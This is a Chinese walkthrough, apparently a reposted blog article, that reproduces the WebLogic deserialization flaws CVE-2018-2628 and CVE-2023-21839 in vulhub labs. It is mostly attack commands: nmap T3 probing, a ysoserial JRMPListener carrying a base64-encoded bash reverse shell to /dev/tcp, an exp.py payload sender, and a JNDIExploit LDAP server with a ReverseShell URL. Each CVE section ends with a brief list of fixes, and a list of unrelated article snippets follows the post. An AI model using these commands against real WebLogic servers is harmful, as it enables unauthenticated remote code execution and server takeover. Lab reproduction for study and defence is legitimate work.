Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839复现)

内容目录

  • Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
    • weblogic中间件
    • CVE-2018-2628
      • 漏洞描述
      • 影响版本
      • 漏洞复现
      • 修复方案
    • CVE-2023-21839
      • 漏洞描述
      • 影响版本
      • 漏洞复现
      • 修复方案

Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)

weblogic中间件

WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。

CVE-2018-2628

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击(开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。)

T3协议缺陷实现了Java虚拟机的远程方法调用(RMI),能够在本地虚拟机上调用远端代码。

T3协议:

用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议。Weblogic会跟踪连接到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3连接。该链接会通过消除在网络之间的多个协议来最大化效率,从而使用较少的操作系统资源。用于T3连接的协议还可以最大限度减少数据包大小,提高传输速度。

RMI方法:

远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。(对象的虚拟化和反序列化广泛应用到RMI和网络传输中)

JRMP:

Java远程消息交换协议JRMP。

JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI该协议传递时底层使用的是JRMP协议,而JRMP底层则是基于TCP传递。

RMI默认使用的JRMP进行传递数据,并且JRMP协议只能作用于RMI协议。当然RMI支持的协议除了JRMP还有IIOP协议,而在Weblogic里面的T3协议其实也是基于RMI去进行实现的。

影响版本

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

漏洞复现

环境:kali linux

靶场:vulhub /vulhub/weblogic/CVE-2018-2628

开启靶场,进入环境:

image-20230919112817669

进行访问:

image-20230919112915568

Nmap扫描目标IP端口,查看是否使用weblogic

nmap -sV 192.168.100.134 //靶场ip地址

扫描结果,开放了7001端口,对应weblogic服务以及版本信息

image-20230919113107730

使用Nmap的脚本查看对方是否开启T3协议,查看到目标站点开启了T3协议

nmap -n -v -p 7001,7002 192.168.100.134 --script=weblogic-t3-info 

扫描结果:说明开启了T3协议

image-20230919113245926

使用扫描工具探测是否存在weblogic漏洞:

工具地址

经过扫描,发现此漏洞(工具可能有所差异不太准确,也可使用图形化界面)

image-20230919115106767

存在CVE-2018-2628漏洞

image-20230919114820553

攻击者需要使用ysoserial启动一个JMRP Server

工具地址

其他架包使用方式都类似,大同小异,查看帮助即可。

JMRP Server在7777端口上监听请求,向目标服务器发送序列化的bash反弹shell命令,反弹监听的端口为9999

PS:

这里使用bash反弹shell,由于Runtime.getRuntime().exec()中不能使用重定向和管道符,这里需要对其进行base64编码再使用

反弹shell命令:

sh -i >& /dev/tcp/192.168.100.1/9999 0>&1

base64编码后:

bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}

开启JMRP Server服务:

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"

image-20230919115608885

本地监听9999端口:

image-20230919121223495

接下来使用CVE-2018-2628的 EXP 向目标WebLogic服务器发送攻击载荷(payload)

python2 exp.py 192.168.100.134 7001 ysoserial-all.jar 192.168.100.1 7777 JRMPClient

image-20230919121436393

JMRP服务接受信息:

image-20230919121506408

查看监听端:

image-20230919121555545

EXP和目标服务器建立T3连接,目标服务器weblogic上的JVM虚拟机远程调用了监听程序中的方法执行序列化操作,将流量反弹到nc上

执行命令也是同样的道理,将反弹shell命令改成想要"执行操作的命令"即可。

比如"touch /test.txt"

image-20230919121910643

来到靶机验证一下是否创建成功:

docker-compose exec weblogic /bin/bash 

image-20230919122001066

创建成功,命令成功被执行。

还可以使用工具进行,相对简单,直接利用:

首先开启JRMP服务:

image-20230919140232727

输入JRMP地址,进行执行

image-20230919140142417

JRMP服务返回信息内容:

image-20230919140322425

验证是否创建成功:

成功创建:

image-20230919140355754

修复方案

  • 打上官方的最新补丁
  • 控制T3服务的访问权限(添加白名单仅给指定几台主机使用)

CVE-2023-21839

漏洞描述

Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响版本

  • WebLogic_Server = 12.2.1.3.0
  • WebLogic_Server = 12.2.1.4.0
  • WebLogic_Server = 14.1.1.0.0

CVE-2023-21839是一个weblogic的JNDI注入漏洞

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

漏洞复现

环境:kali linux

靶场:vulhub vulhub/weblogic/CVE-2023-21839

开启环境:

image-20230919142504679

访问靶场地址:

image-20230919142625342

Nmap扫描:

nmap -sV 192.168.100.134

开放了7001端口,以及对应的weblogic服务版本

image-20230919142850639

扫描验证T3是否开启:

nmap -n -v -p 7001,7002 192.168.100.134 --script=weblogic-t3-info

image-20230919143025768

开启LDAP和HTTP服务

工具地址

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.100.1	//攻击者ip

查看可以使用的服务内容(payload):

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.100.1 -u

image-20230919160453083

本地监听端口6666:

image-20230919160315637

在本地执行命令进行攻击

工具地址

java -jar Weblogic-CVE-2023-21839.jar 192.168.100.134:7001 ldap://192.168.100.1:1389/Basic/ReverseShell/192.168.100.1/6666

PS:java环境为JDK8否则无法运行,报错

image-20230919160908122

LDAP和HTTP服务端返回信息:

image-20230919160953947

查看本地监听端口:

成功反弹shell

image-20230919161035118

另一种方法,直接使用工具,发送JNDI地址服务(开启JNDI):

输入url,验证漏洞

image-20230919161322942

验证回显:

image-20230919161303554

开启服务和以上一致

放入JNDI地址当中,然后执行,一键利用,服务端返回相应的信息以及状态:

image-20230919161424153

查看监听:

成功反弹shell

image-20230919161500414

修复方案

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/86263.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

在给应用ASO优化时要注意些什么

应用名称是搜索引擎优化和转化率优化非常重要的元素。用户在搜索结果页面中看到我们的应用程序,这是他们决定是否想要更多地了解我们应用的地方。当用户已经在查看产品页面时,应用程序名称也会影响转化率,如果列表元数据有吸引力,…

代码随想录二刷day36

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、力扣435. 无重叠区间二、力扣763. 划分字母区间三、力扣56. 合并区间 前言 一、力扣435. 无重叠区间 class Solution {public int eraseOverlapIntervals(…

异步回调

Future 设计的初衷:对将来的某个事件的结果进行建模 package com.kuang.future;import com.kuang.pc.C;import java.util.concurrent.CompletableFuture; import java.util.concurrent.ExecutionException; import java.util.concurrent.TimeUnit; import java.uti…

静态路由与默认路由配置

实验原理: 路由分类 (1)根据目的网络的不同,路由可以划分为: 特定网络路由:目的网络为目的主机所在网络的IP地址,其子网掩码表示的前缀长度为32位(对于IPv4地址)&…

priority_queue 模拟与用法

priority_queue 用法 priority_queue priority_queue 模拟 #include <vector> namespace sjy {//仿函数 1template <typename T>class Less{public:bool operator()(const T& x, const T& y){return x < y;}};//仿函数 2template <typename T>…

一些常见的算法

常见算法有很多种&#xff0c;以下列举了一些常见的算法&#xff1a; 堆排序算法&#xff1a;是一种利用堆这种数据结构所设计的一种排序算法。哈希算法&#xff1a;哈希算法将任意长度的二进制值映射为较短的固定长度的二进制值&#xff0c;这个小的二进制值称为哈希值&#…

stm32_标准库_中断_按键点灯|蜂鸣器

配置流程 需要对AFIO、EXTI、NVIC、GPIOB进行配置形成通路将中断连接至CPU APB2总线连接的寄存器 LED灯代码 #include "stm32f10x.h" // Device header #include "Delay.h"GPIO_InitTypeDef GIPO_InitStruct;//结构体配置GPIO EXTI_InitTypeDef EXTI_…

算法 数据流的中位数-(大顶堆小顶堆+冒泡排序)

牛客网: BM48 题目: 得到数据流的中位数 思路: (1) 冒泡排序: 每次插入元素时&#xff0c;进行冒泡排序&#xff0c;将当前值与前一值比较&#xff0c;当前值较小时与前一元素交换&#xff0c;直至不小于前一元素时结束。 (2) 大小顶堆: 设置两个堆min为大顶堆(最大值在堆顶…

WPS文件找回怎么做?文件恢复,4个方法!

“我平时习惯了用wps来记录一些工作心得或重点&#xff0c;不知道什么原因&#xff0c;有些很重要的文件莫名不见了&#xff0c;有什么方法可以帮我找回wps文件吗&#xff1f;” wps作一个常用的办公软件&#xff0c;有效的提高了我们的工作效率。在日常使用wps时&#xff0c;可…

非常详细的git-flow分支管理流程配置及使用

非常详细的git-flow分支管理流程配置及使用。 git-flow有两个涵义,一个是指软件开发领域的版本管理流程Gitflow。另一个是指git命令工具git flow。 目前业界主流的版本管理流程是Gitflow 和 trunk-based。 Gitflow流行的比较早。但是目前的流行度要低于 trunk-based模式工作…

RocketMQ 相关文档

官方文档&#xff1a;为什么选择RocketMQ | RocketMQ (apache.org) Rocketmq 5.x架构介绍文章&#xff1a;终于&#xff01;RocketMQ发布5.0版本&#xff1a;架构大重构&#xff0c;代码变更比例高达60%-腾讯云开发者社区-腾讯云 (tencent.com)

爬虫中出现OSError: [WinError 193] %1 不是有效的 Win32 应用程序。

如果出现了 OSError: [WinError 193] %1 不是有效的 Win32 应用程序。那可能是你的Chromedriver版本和Chrome版本不一致。 我是花钱买的&#xff0c;这里免费分享给大家Chrome116版本对应的ChromeDriver 资源发布了&#xff0c;如果有需要私信我要吧

debian安装qq及更新

文章目录 一、安装二、卸载QQ三、更新 一、安装 1.下载Linux QQ安装包 wget https://dldir1.qq.com/qqfile/qq/QQNT/c6032ac7/linuxqq_3.1.0-9332_amd64.deb2.安装软件包 apt install ./linuxqq_3.1.0-9332_amd64.deb3.终端启动QQ qq二、卸载QQ apt remove linuxqq三、更新…

qt功能自己创作

按钮按下三秒禁用 void MainWindow::on_pushButton_5_clicked(){// 锁定界面setWidgetsEnabled(ui->centralwidget, false);// 创建一个定时器&#xff0c;等待3秒后解锁界面QTimer::singleShot(3000, this, []() {setWidgetsEnabled(ui->centralwidget, true);;//ui-&g…

MySQL8.0版安装教程 + Workbench可视化配置教程(史上最细、一步一图解)

文章目录 一、安装MySQL1、选择版本&#xff0c;点击“Download”进行下载2、双击下载好的安装包&#xff0c;点击运行3、选择安装类型为“Custom”4、依次进行选择&#xff0c;选到MySQL Servers 8.0.33 -X64&#xff0c;点击向右的箭头5、选中MySQL Servers 8.0.33 -X64&…

Mysql004:用户管理

前言&#xff1a;本章节讲解的是mysql中的用户管理&#xff0c;包括&#xff08;管理数据用户&#xff09;、&#xff08;控制数据库的访问权限&#xff09;。 目录 1. 查询用户 2. 创建用户 3. 修改用户密码 4. 删除用户 5. 权限控制 1. 查询用户 在mysql数据库中&#xff0…

【通信误码】python实现-附ChatGPT解析

1.题目 通信误码 时间限制: 1s 空间限制: 32MB 限定语言: 不限 题目描述: 信号传播过程中会出现一些误码,不同的数字表示不同的误码ID, 取值范围为1~65535,用一个数组“记录误码出现的情况。 每个误码出现的次数代表误码频度, 请找出记录中包含频度最高误码的最小子数组长度…

OpenCV自学笔记二十二:绘图及交互

一、绘图基础 下面是关于OpenCV绘图基础函数的说明和举例&#xff1a; 1. cv2.line()&#xff1a;绘制直线 cv2.line(img, pt1, pt2, color, thickness, lineType) - img: 需要绘制直线的图像。 - pt1: 直线起始点坐标。 - pt2: 直线结束点坐标。 - color: 直线颜色&…

Java客户端_zkclient库操作Zookeeper

使用zookeeper遇到问题&#xff1a; 重复注册watchersession失效重连异常处理&#xff08;删除节点不能有子节点&#xff0c;新增节点必须有父节点等&#xff09; zkclient是Github上一个开源的Zookeeper客户端&#xff0c;在Zookeeper原生 API接口之上进行了包装&#xff0c;是…